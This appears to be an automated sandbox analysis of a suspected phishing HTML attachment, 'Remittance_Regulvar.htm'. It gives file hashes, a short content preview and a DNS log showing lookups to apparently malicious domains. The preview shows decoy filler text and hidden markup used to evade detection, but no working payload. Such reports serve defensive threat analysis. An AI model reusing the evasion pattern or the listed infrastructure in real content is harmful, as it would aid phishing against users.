                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/tag/js/gpt.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1387)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.309983263556393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:hAt8WZXsvVR/fGp1CUFsRR+rdIHghdIrAErXp4O8Xb0s8gs360YjT7FOXsA:hAt8lvVRnGp1CUFsRU0glEr521zf7LA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:92086DBA3636BF9DF0C22157B81DB473
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BE8FE7CF4930F13CD37A26790CB1A4C90BC263C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:212E318CF04B66BBA706210DCC666C7A2CE11E070BAE23CBE19CEC5291BED64D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6BCBC1D5F2C1D443D2C153F9965C2F8F93E0F8CE50DE15721EA656360BA24B5B2F985AA04B17A37C10668DC23485C0A14FAD727E38003A49040645FD09C643C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadQuoteType.mGEeGxqN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{l,f as L}from"./logUtil.hOue7iAU.js";import{d as x}from"./commonUtil.CI22_Irn.js";async function E(a,{symbol:t,silent:i=!1}){var c;if(!t){const e=new Error("Bad request for loadQuoteType");return l(a,{silent:i,symbol:t},{data:e,perfLabel:"loadQuoteType"}),Promise.reject(e)}const[n]=await x(["quote"],a),r=n.getQuoteSummary(t);if(r!=null&&r.quoteType)return r.quoteType;const s=n.getQuote(t);if(s){const e=s.quoteType,o=Object(e)===e?e:s,{exchange:T,exchangeTimezoneName:q,exchangeTimezoneShortName:y,gmtOffSetMilliseconds:d,longName:g,market:h,messageBoardId:m,quoteType:Q,shortName:v,isEsgPopulated:F,sectorKey:w,industryKey:N}=o,p={exchange:T,exchangeTimezoneName:q,exchangeTimezoneShortName:y,gmtOffSetMilliseconds:d==null?void 0:d.toString(),longName:g,market:h,messageBoardId:m,quoteType:Q,shortName:v,symbol:t};if(Object.values(p).every(f=>f!==void 0)){const S=Object.entries({industryKey:N,isEsgPopulated:F,sectorKey:w}).filter(([,u])=>u!==void 0).reduce((u,[O,j])=>(u[O]=j,u),{});retu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (516)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.623566184928948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:jhy2pIRDhKUqaEiFyXEMdsEMXAXNcLAmVWmZjTJjuL6Gqhy2QuzNBhy2o4U1zC4a:jY24kUqaEEcayNcL3V33Jjt3Y2xY2okv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9CAC70F391474011812CF9713BB057CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FCDFFD87A357D6AF15187BB511E0A64675DAF280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4AB4DE8B30256D50C6906D7AC5E6409CD16864C2BC1C5DFB15B702E08CBE2627
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:117C312980B6FDB506CD6FB0F0644034618BA952E604D0B79BD0316AE4F9BF25BE5B915BE7031633059116D7EE48F3D838FAEAA4453FE0B2CDCB7DE911418D88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/TopicPill.Cd876vvj.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.topic-link.yf-nhs2sl{background-color:var(--surface2);gap:var(--space-4);display:inline-flex;color:var(--enabled-active-brand);border:1px solid var(--enabled-active-brand);padding:var(--space-1) var(--space-6);align-items:center;border-radius:var(--border-radius-s);font-size:var(--font-s);cursor:pointer;font-weight:var(--font-medium)}.topic-link.yf-nhs2sl:hover{color:var(--hovered-brand);border-color:var(--hovered-brand)}.topic-link.yf-nhs2sl:active{color:var(--pressed-brand);border-color:var(--pressed-brand)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.21109664847411
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHbuHPk4FUjwAZIAdSfFE7evn:+9mc4sl3O4Cc4FIVIv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:11637EFDD5023C74A30749CDBDF996E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8D377941670A818645AAAD4008EBF2014B186050
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CD9E0584F82F63FC2424620113B1EDC4BA6AF9B27A5DEEB9140F61E1CF54B59C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:309058AFFBD9018BF35929E69FE7BE50F42EA384B3FFDF100CC4D02995ECF050CDFB122AE4C152CAC757F1B20DACF13238773F2CFB66F0CD6EF65786C7A37D12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"/></svg>';export{w as D};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=smart_adserver_eb&google_push=AXcoOmQtgL3p45pJNmv41m5Bu0i_G3G2BQIRFgMaXv4wvlihbwdBNWhtM6o9sidpDraJw2WrbhQ0ae7up1oPforyrNOln0n8giJSJg&google_hm=NDMxNDcxNzIwMTI0MTk0ODg4Nw%3D%3D&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8545)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.508391154066929
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:J5fqN3MLNI2PU0AAx0uGuXfArTYKRPUceTW/E7Xgq/zYHjRotI64Ct:J5fqlwNIxApfKUCE7XgqdtI64s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B024A2C43820114F5483C732A7C355CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B8BE39D8CF8084B0D1EA1EC2D07C3DA80ADD2E4D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:111CD45685DE7F9D43A8A0063BB609D283386DAC7254FA57221A31D75EFC0142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:01F54DEF2B161DDF360CB05C6BF775EBBE01BEB869B5FC4E04776783F3D202F51ACE9F3924C1896BFDBCF5E6EC744789E245CF8BAE960DA4867CE53B2FA5E39E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as w,c as P,e as M,d as O,f as S,i as N,q as c,_ as v,k as L,u as Q,g as Y,a as F,P as re,b as J,j as K,U as C,l as E,A as Z,T as ee,a8 as le,G as ze,Q as Ce}from"./scheduler.Dr9AAxFe.js";import{S as de,i as ue,t as z,a as k,g as me,e as ce,f as ae,c as ke,b as Ne,m as Ie,d as ve}from"./index.DCSmZEjO.js";import{g as ye}from"./spread.CgU5AtxT.js";import{g as _e,r as Te}from"./i13nUtil.C-uBpR7k.js";import{I as Ee}from"./Icon.BSWt_jx8.js";import{C as Me}from"./expand_more.DscV4c36.js";import{s as te}from"./index.C_UqkgE3.js";import{n as Oe}from"./commonUtil.CI22_Irn.js";function Se(l){let e,a,d;const o=l[3].default,f=P(o,l,l[2],null);return{c(){e=M("div"),f&&f.c(),this.h()},l(n){e=O(n,"DIV",{class:!0});var s=S(e);f&&f.l(s),s.forEach(N),this.h()},h(){c(e,"class",a=v(`container ${l[0]}`)+" yf-10zi8b3")},m(n,s){L(n,e,s),f&&f.m(e,null),l[4](e),d=!0},p(n,[s]){f&&f.p&&(!d||s&4)&&Q(f,o,n,n[2],d?F(o,n[2],s,null):Y(n[2]),null),(!d||s&1&&a!==(a=v(`container ${n[0]}`)+" yf-10zi8b3"))&&c(e,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File type:HTML document, ASCII text, with very long lines (4456), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7547119237803375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • HyperText Markup Language (6006/1) 100.00%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File name:Remittance_Regulvar.htm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File size:6'784 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8900e6a2d46556db4ba0473bca53e998
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8e61705c3941499775be2098ec9db7c12aa446bf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256:29950e5595fbb6c398c59b3f9c95296c1b89db12d1dba555b6671dfb08caf0f1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512:28215588378598a47f9c25e025dda0f76610eb9b0db79f5d32a8ea6051d12a9214876f768609cf3c33e4c95bae01d64269716bf57770ef72d2d2f85707eab32a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:5d35UfON2RSfyXdu3Nf3s1hWosMT2SKABbNtSujxhS9IbfZ4UvyVrqrtX1j0Jbh9:KRiytS9cuosM5dTQrq7WX8/E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TLSH:E2E156016E858B2608C782377BA94D9AD126CCDF1F4122BE35DC5269D376722D1DCEF4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Content Preview:<html> <b> She baked cookies and shared them with her neighbors. </b> --><script>..</script>..<div style='display:none;'> The baker decorated the cake with intricate designs. </div> ..<script>..cuckoo /* vanilla */
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:12:59.853333950 CEST192.168.2.41.1.1.10x9719Standard query (0)mollysirishpub-tol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:12:59.853773117 CEST192.168.2.41.1.1.10xcfe6Standard query (0)mollysirishpub-tol.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.568015099 CEST192.168.2.41.1.1.10xd8e8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.568217039 CEST192.168.2.41.1.1.10xf810Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.570501089 CEST192.168.2.41.1.1.10x6e84Standard query (0)mollysirishpub-tol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.570735931 CEST192.168.2.41.1.1.10x247cStandard query (0)mollysirishpub-tol.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.525366068 CEST192.168.2.41.1.1.10xdfbbStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.525847912 CEST192.168.2.41.1.1.10x38f5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.701024055 CEST192.168.2.41.1.1.10x14a3Standard query (0)ortkn.lovationyme.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.701188087 CEST192.168.2.41.1.1.10x8853Standard query (0)ortkn.lovationyme.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.520154953 CEST192.168.2.41.1.1.10xa6a9Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.520966053 CEST192.168.2.41.1.1.10x6d0aStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.522418976 CEST192.168.2.41.1.1.10x4b93Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.523094893 CEST192.168.2.41.1.1.10x92c8Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.524699926 CEST192.168.2.41.1.1.10x4a06Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.525360107 CEST192.168.2.41.1.1.10x8e56Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.661027908 CEST192.168.2.41.1.1.10x7cccStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.662173986 CEST192.168.2.41.1.1.10x1616Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.077734947 CEST192.168.2.41.1.1.10xec39Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.078250885 CEST192.168.2.41.1.1.10x5994Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.084852934 CEST192.168.2.41.1.1.10xfe78Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.085745096 CEST192.168.2.41.1.1.10x4122Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.103104115 CEST192.168.2.41.1.1.10x20ffStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.103449106 CEST192.168.2.41.1.1.10xa432Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:08.902017117 CEST192.168.2.41.1.1.10xb4daStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:08.902178049 CEST192.168.2.41.1.1.10x90b0Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:29.318082094 CEST192.168.2.41.1.1.10xa624Standard query (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:29.325182915 CEST192.168.2.41.1.1.10x11c6Standard query (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.392800093 CEST192.168.2.41.1.1.10x8f47Standard query (0)yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.393053055 CEST192.168.2.41.1.1.10x42Standard query (0)yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400075912 CEST192.168.2.41.1.1.10xdeeeStandard query (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:31.400324106 CEST192.168.2.41.1.1.10xc43aStandard query (0)dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:32.023225069 CEST192.168.2.41.1.1.10xbbaeStandard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:32.023427963 CEST192.168.2.41.1.1.10x60ccStandard query (0)www.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.316297054 CEST192.168.2.41.1.1.10x2fdbStandard query (0)geo.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.316521883 CEST192.168.2.41.1.1.10xe138Standard query (0)geo.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.316903114 CEST192.168.2.41.1.1.10x558aStandard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.317114115 CEST192.168.2.41.1.1.10xe680Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.317765951 CEST192.168.2.41.1.1.10x1262Standard query (0)geo.query.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.318564892 CEST192.168.2.41.1.1.10xfc14Standard query (0)geo.query.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.331240892 CEST192.168.2.41.1.1.10x55c7Standard query (0)search.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.331379890 CEST192.168.2.41.1.1.10x7896Standard query (0)search.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.906934977 CEST192.168.2.41.1.1.10x1834Standard query (0)consent.cmp.oath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:33.907361031 CEST192.168.2.41.1.1.10x7dc7Standard query (0)consent.cmp.oath.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.176095963 CEST192.168.2.41.1.1.10x25edStandard query (0)edge-mcdn.secure.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.176235914 CEST192.168.2.41.1.1.10x24caStandard query (0)edge-mcdn.secure.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.361392975 CEST192.168.2.41.1.1.10x6c91Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:34.361541033 CEST192.168.2.41.1.1.10xeef7Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:35.203970909 CEST192.168.2.41.1.1.10x33efStandard query (0)edge-mcdn.secure.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:35.204152107 CEST192.168.2.41.1.1.10xa762Standard query (0)edge-mcdn.secure.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:36.797840118 CEST192.168.2.41.1.1.10x39d0Standard query (0)udc.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:36.798146009 CEST192.168.2.41.1.1.10xd846Standard query (0)udc.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:37.216731071 CEST192.168.2.41.1.1.10xf9f5Standard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:37.216892958 CEST192.168.2.41.1.1.10xf17dStandard query (0)www.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.166809082 CEST192.168.2.41.1.1.10x3f21Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.166925907 CEST192.168.2.41.1.1.10xc2edStandard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.167465925 CEST192.168.2.41.1.1.10x126dStandard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:38.167629004 CEST192.168.2.41.1.1.10xd4d7Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.476237059 CEST192.168.2.41.1.1.10xb801Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.476362944 CEST192.168.2.41.1.1.10x4652Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.907670975 CEST192.168.2.41.1.1.10xaa6dStandard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.907841921 CEST192.168.2.41.1.1.10xd1a0Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.947607040 CEST192.168.2.41.1.1.10x9f7Standard query (0)cdn.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:39.947804928 CEST192.168.2.41.1.1.10x1e20Standard query (0)cdn.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.384727001 CEST192.168.2.41.1.1.10x436eStandard query (0)opus.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:43.384727001 CEST192.168.2.41.1.1.10xd947Standard query (0)opus.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.512531996 CEST192.168.2.41.1.1.10x4bdaStandard query (0)noa.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.512981892 CEST192.168.2.41.1.1.10x6f7bStandard query (0)noa.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.530299902 CEST192.168.2.41.1.1.10x66c7Standard query (0)opus.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.530685902 CEST192.168.2.41.1.1.10x9d15Standard query (0)opus.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.964602947 CEST192.168.2.41.1.1.10x506aStandard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:44.964745045 CEST192.168.2.41.1.1.10x3181Standard query (0)trc.taboola.com65IN (0x0001)false
